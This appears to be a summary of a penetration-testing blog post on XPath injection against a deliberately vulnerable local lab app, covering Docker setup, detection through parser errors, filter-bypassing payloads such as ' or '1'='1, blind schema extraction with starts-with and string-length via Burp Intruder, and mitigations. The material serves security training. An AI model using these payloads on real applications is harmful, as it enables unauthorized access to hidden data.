Exploiting XPath Injection Weaknesses

This article demonstrates practical XPath injection techniques against a vulnerable BookFinder web app, including lab setup, detection via syntax errors, payload crafting to bypass filters, and schema extraction using XPath functions. It also documents defenses such as parameterized queries, input validation, whitelisting, escaping, and proper error handling. #XPathInjection #NetSPI

Keypoints

  • Provides steps to set up a vulnerable lab from the NetSPI GitHub repo and run it in Docker (bookapp on localhost:8888).
  • Shows how injecting special characters (e.g., single quote) can trigger XPath parser errors indicating an injection point (XPathException).
  • Demonstrates common test payloads (‘ or ‘1’=’1) and techniques to bypass defenses that block ‘=’ by using ” or functions like contains().
  • Details schema discovery and data extraction using XPath functions: string-length(), starts-with(), count(), and contains() to enumerate root/node names and node counts.
  • Explains automating character-by-character extraction with Burp Suite Intruder (cluster bomb) to derive node names such as “Books” and “Book”.
  • Shows extracting unpublished or hidden records by querying attributes (e.g., contains(@published, ‘false’)).
  • Lists practical mitigations: parameterized XPath, input validation/whitelisting, escaping special characters, least privilege, and safe error handling.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Injection of malicious XPath expressions into a web endpoint to manipulate XML queries (e.g., request causing “System.Xml.XPath.XPathException: This is an unclosed string.”: [‘System.Xml.XPath.XPathException: This is an unclosed string.’]).
  • [T1213] Data from Information Repositories – Extracting XML schema and hidden data by abusing XPath functions to enumerate element names, counts, and attributes (e.g., “‘ or contains(@published, ‘false’) or’”).

Indicators of Compromise

  • [Repository URL] lab source – https://github.com/NetSPI/XPath-Injection-Lab.git
  • [Endpoint] vulnerable web app – https://localhost:8888 (POST /Home/FindBook), Host: localhost:8888
  • [Error/Stacktrace] XPath parser error returned – “System.Xml.XPath.XPathException: This is an unclosed string.”
  • [Payload examples] injection strings seen in requests – “‘ or ‘1’=’1”, “‘ or string-length(name(/*)) < 0 or ‘”, “‘ or contains(@published, ‘false’) or’”

‘Lab setup and exploitation procedure (technical summary)

Clone and run the vulnerable app locally: git clone https://github.com/NetSPI/XPath-Injection-Lab.git; cd XPath-Injection-Lab; docker build -t bookapp .; docker run -p 8888:80 bookapp. Point a proxy (e.g., Burp Suite) at https://localhost:8888 and observe POST /Home/FindBook requests.

Identify injection points by submitting special characters (e.g., a single quote) and watching for XPath parser errors (e.g., “System.Xml.XPath.XPathException: This is an unclosed string.”). If ‘=’ is blocked by filters, craft payloads that avoid it (use ” comparisons or functions like contains()). Example test payloads: ‘ or ‘1’=’1, ” or “1”=”1, and variations using ‘<‘ such as ‘ or ‘1’ < ‘2 which evaluates true via string comparison.

Enumerate and extract the XML structure using XPath functions: determine root name length with string-length(name(/*)); enumerate characters with starts-with(name(/*), ‘X’) iteratively (automate via Burp Intruder cluster bomb) to derive “Books”; count child nodes using count(/*[1]/*) to find number of entries; find child node name length with string-length(name(/*[1]/*)) and extract it with starts-with; and retrieve hidden records by querying attributes (e.g., ‘ or contains(@published, ‘false’) or’ to surface unpublished Book entries). Defenses: use parameterized XPath, strict input validation/whitelists, escape special characters, apply least privilege to XML data access, and suppress detailed error messages.

Read more: https://www.netspi.com/blog/technical/web-application-penetration-testing/exploiting-xpath-injection-weaknesses/